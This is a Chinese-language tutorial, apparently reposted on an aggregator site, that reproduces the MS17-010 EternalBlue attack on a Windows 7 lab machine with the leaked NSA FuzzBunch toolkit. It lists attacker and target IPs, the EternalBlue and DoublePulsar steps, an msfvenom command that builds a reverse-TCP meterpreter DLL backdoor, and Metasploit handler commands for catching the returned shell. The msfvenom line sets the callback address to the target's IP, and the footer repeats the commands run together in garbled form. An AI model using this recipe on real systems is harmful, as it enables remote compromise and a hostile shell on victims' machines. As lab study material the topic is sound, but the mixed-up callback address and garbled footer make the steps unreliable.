概述
利用的是NSA爆出来的工具箱
攻击机IP:10.1.6.154
靶机IP :10.1.6.153
靶机系统 : windows7 x64
Target ip : 设置目标 IP 10.1.6.153
Callback IP: 设置本地 IP 10.1.6.154
Use Redirection:设置重定向 no
设置日志目录 : C:logs
设置项目名称
Fb > use eternalblue 选择永恒之蓝模块
这里的target 指的是目标的操作系统
然后用kali生成小马,
msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=10.1.6.153 LPORT=5555 -f dll >backdoor.dll
在root目录下生成一个backdoor.dll的马, 将马打包 到10.1.6.154这台攻击机上
然后打开smfconsole设置tcp监听
设置监听的命令:
use exploit/multi/handler
set payloadwindows/x64/meterpreter/reverse_tcp
set lhost 10.1.6.154
set lport 5555
使用 use Doublepulsar 模块 向靶机传入小马
选择SMB服务 x64系统 rundll 注入 dll
Dllpayload: 选择dll的路径
攻击成功 返回kali的监听端口上看到反弹到shell
最后
以上就是害羞月饼为你收集整理的ms17_010复现use exploit/multi/handlerset payloadwindows/x64/meterpreter/reverse_tcpset lhost 10.1.6.154set lport 5555的全部内容,希望文章能够帮你解决ms17_010复现use exploit/multi/handlerset payloadwindows/x64/meterpreter/reverse_tcpset lhost 10.1.6.154set lport 5555所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复